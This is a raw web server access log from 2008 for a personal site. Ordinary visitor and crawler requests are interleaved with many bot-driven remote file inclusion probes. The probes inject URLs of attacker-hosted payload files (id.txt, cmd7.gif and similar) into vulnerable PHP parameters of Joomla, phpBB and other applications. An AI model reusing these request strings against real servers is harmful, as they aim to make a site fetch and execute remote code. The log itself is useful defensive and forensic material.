74.6.18.216 - - [28/Aug/2008:09:00:11 -0700] "GET /logs/access_080709.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:00:18 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-128.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
12.206.23.168 - - [28/Aug/2008:09:00:20 -0700] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:09:00:21 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:09:00:21 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:09:00:21 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:09:00:42 -0700] "GET /logs/access_080704.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:09:00:42 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:09:00:43 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:09:00:43 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.145.244.100 - - [28/Aug/2008:09:01:12 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.billarddepot.ca/market/logs/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:09:01:22 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:09:01:22 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:09:01:22 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:09:01:22 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.56.111.194 - - [28/Aug/2008:09:01:28 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:09:01:33 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:09:01:33 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:01:51 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-094.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
65.18.170.161 - - [28/Aug/2008:09:01:54 -0700] "GET //include/lib.inc.php?site_path=http://locoputo1234.100webspace.net/bots/ids.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.170.161 - - [28/Aug/2008:09:01:54 -0700] "GET /logs/access_080801.log//include/lib.inc.php?site_path=http://locoputo1234.100webspace.net/bots/ids.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.170.161 - - [28/Aug/2008:09:01:54 -0700] "GET /logs//include/lib.inc.php?site_path=http://locoputo1234.100webspace.net/bots/ids.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [28/Aug/2008:09:02:02 -0700] "GET /logs/access_080507.log/index1.php?=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [28/Aug/2008:09:02:02 -0700] "GET /index1.php?=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [28/Aug/2008:09:02:02 -0700] "GET /logs/index1.php?=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:09:02:06 -0700] "GET /logs/access_080703.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.170.161 - - [28/Aug/2008:09:02:08 -0700] "GET /logs/access_080724.log//include/lib.inc.php?site_path=http://locoputo1234.100webspace.net/bots/ids.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:02:15 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-066_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
74.6.18.216 - - [28/Aug/2008:09:02:16 -0700] "GET /logs/access_071017.log HTTP/1.0" 200 21727 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.91.224.8 - - [28/Aug/2008:09:02:17 -0700] "GET /logs/access_080321.log HTTP/1.1" 200 365679 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.dmulk.com"
87.101.4.49 - - [28/Aug/2008:09:02:17 -0700] "GET /logs/access_080719.log/index1.php?=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:09:02:22 -0700] "GET /logs/access_070719.log HTTP/1.0" 200 50682 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.18.170.161 - - [28/Aug/2008:09:02:32 -0700] "GET /logs/access_080412.log/?sourcedir=http://locoputo1234.100webspace.net/bots/ids.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.170.161 - - [28/Aug/2008:09:02:33 -0700] "GET /logs/access_080313.log/?sourcedir=http://locoputo1234.100webspace.net/bots/ids.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.170.161 - - [28/Aug/2008:09:02:33 -0700] "GET /logs/?sourcedir=http://locoputo1234.100webspace.net/bots/ids.txt???%0D?? HTTP/1.1" 200 62571 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.170.161 - - [28/Aug/2008:09:02:35 -0700] "GET /?sourcedir=http://locoputo1234.100webspace.net/bots/ids.txt???%0D?? HTTP/1.1" 200 85175 "-" "libwww-perl/5.805" "www.dmulk.com"
202.43.35.133 - - [28/Aug/2008:09:02:40 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.43.35.133 - - [28/Aug/2008:09:02:40 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.34.172 - - [28/Aug/2008:09:03:00 -0700] "GET /logs//parse/parser.php?WN_BASEDIR=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.64.34.172 - - [28/Aug/2008:09:03:04 -0700] "GET //parse/parser.php?WN_BASEDIR=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:03:29 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-109_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:03:41 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.18.170.161 - - [28/Aug/2008:09:04:03 -0700] "GET /?sourcedir=http://locoputo1234.100webspace.net/bots/ids.txt???%0D?? HTTP/1.1" 200 85175 "-" "libwww-perl/5.805" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:09:04:19 -0700] "GET /logs/errors.php?error=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:09:04:19 -0700] "GET /errors.php?error=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:09:04:20 -0700] "GET /bikes/dteel/2008-05-30/?M=A HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:04:24 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-042_0.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:04:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-051_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:04:37 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-072_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:04:49 -0700] "GET //claroline/work.php?includePath=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:04:49 -0700] "GET /logs/access_080106.log//claroline/work.php?includePath=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:04:57 -0700] "GET /logs//claroline/work.php?includePath=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
65.254.61.170 - - [28/Aug/2008:09:04:59 -0700] "GET /logs/access_080820.log/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://clan.gotr00t.net/temp//style.css?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.18.170.161 - - [28/Aug/2008:09:05:18 -0700] "GET /logs/access_080804.log/?sourcedir=http://locoputo1234.100webspace.net/bots/ids.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:05:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-012_0.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:05:30 -0700] "GET /logs/access_080114.log//claroline/work.php?includePath=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:09:05:32 -0700] "GET //view_video.php?viewkey=http://b4st4rd1d3ntr0.altervista.org/fuck.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:09:05:32 -0700] "GET /logs//view_video.php?viewkey=http://b4st4rd1d3ntr0.altervista.org/fuck.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:05:48 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0051.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:06:01 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-157_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:06:34 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-023_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:07:02 -0700] "GET /logs/access_080201.log/modules/TotalCalendar/about.php?inc_dir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:07:03 -0700] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:07:24 -0700] "GET /logs/access_080821.log/modules/TotalCalendar/about.php?inc_dir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.111.11.7 - - [28/Aug/2008:09:07:51 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [28/Aug/2008:09:07:52 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.38 - - [28/Aug/2008:09:08:11 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.38 - - [28/Aug/2008:09:08:11 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.66.193.168 - - [28/Aug/2008:09:08:27 -0700] "GET / HTTP/1.1" 200 84795 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:09:08:37 -0700] "GET /logs/access_071204.log HTTP/1.0" 200 9222 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.146.70.18 - - [28/Aug/2008:09:08:41 -0700] "GET /_blogadata/include/struct_admin.php?incl_page=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.146.70.18 - - [28/Aug/2008:09:08:41 -0700] "GET /_blogadata/include/struct_admin_blog.php?incl_page=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.146.70.18 - - [28/Aug/2008:09:08:41 -0700] "GET /_blogadata/include/struct_main.php?incl_page=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.55.140.43 - - [28/Aug/2008:09:08:50 -0700] "GET /_blogadata/include/struct_main.php?incl_page=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.55.140.43 - - [28/Aug/2008:09:08:50 -0700] "GET /_blogadata/include/struct_admin_blog.php?incl_page=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.55.140.43 - - [28/Aug/2008:09:08:50 -0700] "GET /_blogadata/include/struct_admin.php?incl_page=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
83.222.30.248 - - [28/Aug/2008:09:09:01 -0700] "GET /logs/access_080216.log//admin/frontpage_right.php?loadadminpage=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.30.248 - - [28/Aug/2008:09:09:01 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.231.2 - - [28/Aug/2008:09:09:01 -0700] "GET /_blogadata/include/struct_admin.php?incl_page=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
83.222.30.248 - - [28/Aug/2008:09:09:02 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.231.2 - - [28/Aug/2008:09:09:04 -0700] "GET /_blogadata/include/struct_main.php?incl_page=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.53.231.2 - - [28/Aug/2008:09:09:05 -0700] "GET /_blogadata/include/struct_admin_blog.php?incl_page=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
83.222.30.248 - - [28/Aug/2008:09:09:24 -0700] "GET /logs/access_080703.log//admin/frontpage_right.php?loadadminpage=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:09:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-037_3.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
118.98.168.18 - - [28/Aug/2008:09:09:41 -0700] "GET /logs/access_070924.log HTTP/1.0" 200 106285 "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=using" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Opera 7.23 [zh-tw]" "www.dmulk.com"
87.119.195.22 - - [28/Aug/2008:09:10:18 -0700] "GET /logs//?mosConfig_absolute_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 200 62576 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
87.119.195.22 - - [28/Aug/2008:09:10:19 -0700] "GET //?mosConfig_absolute_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 200 85127 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:10:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-110_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:11:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-020.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
65.55.211.27 - - [28/Aug/2008:09:11:54 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.211.27 - - [28/Aug/2008:09:11:55 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/ HTTP/1.1" 200 7923 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
137.192.243.2 - - [28/Aug/2008:09:12:20 -0700] "GET /logs/access_080806.log/?DOCUMENT_ROOT=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:12:21 -0700] "GET /logs/access_080218.log///tools/send_reminders.php?noSet=0&includedir=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:09:12:21 -0700] "GET /?DOCUMENT_ROOT=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 85247 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:09:12:22 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 62571 "-" "libwww-perl/5.808" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:12:48 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-001.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
202.43.35.133 - - [28/Aug/2008:09:12:49 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.43.35.133 - - [28/Aug/2008:09:12:49 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.43.35.133 - - [28/Aug/2008:09:12:49 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.43.35.133 - - [28/Aug/2008:09:12:49 -0700] "GET /logs/access_080216.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:13:10 -0700] "GET /logs/access_080111.log/modules/vwar/admin/admin.php?vwar_root=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:13:10 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:09:13:12 -0700] "GET /logs/access_080223.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:13:14 -0700] "GET /logs/access_080410.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.133.215.166 - - [28/Aug/2008:09:13:32 -0700] "GET /logs/access_080621.log///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:13:37 -0700] "GET /logs/access_080127.log/modules/vwar/admin/admin.php?vwar_root=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:13:48 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-122_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
137.192.243.2 - - [28/Aug/2008:09:13:49 -0700] "GET /logs/access_080518.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:13:58 -0700] "GET /logs/access_080301.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:14:05 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-219.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
209.51.155.138 - - [28/Aug/2008:09:15:15 -0700] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://www.gseek.net/userimgs/4783e9ccf06969c7fb9c517ec.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
209.51.155.138 - - [28/Aug/2008:09:15:15 -0700] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
209.51.155.138 - - [28/Aug/2008:09:15:15 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.gseek.net/userimgs/4783e9ccf06969c7fb9c517ec.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
209.51.155.138 - - [28/Aug/2008:09:15:15 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
209.51.155.138 - - [28/Aug/2008:09:15:15 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.gseek.net/userimgs/4783e9ccf06969c7fb9c517ec.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
209.51.155.138 - - [28/Aug/2008:09:15:15 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:15:18 -0700] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:15:18 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
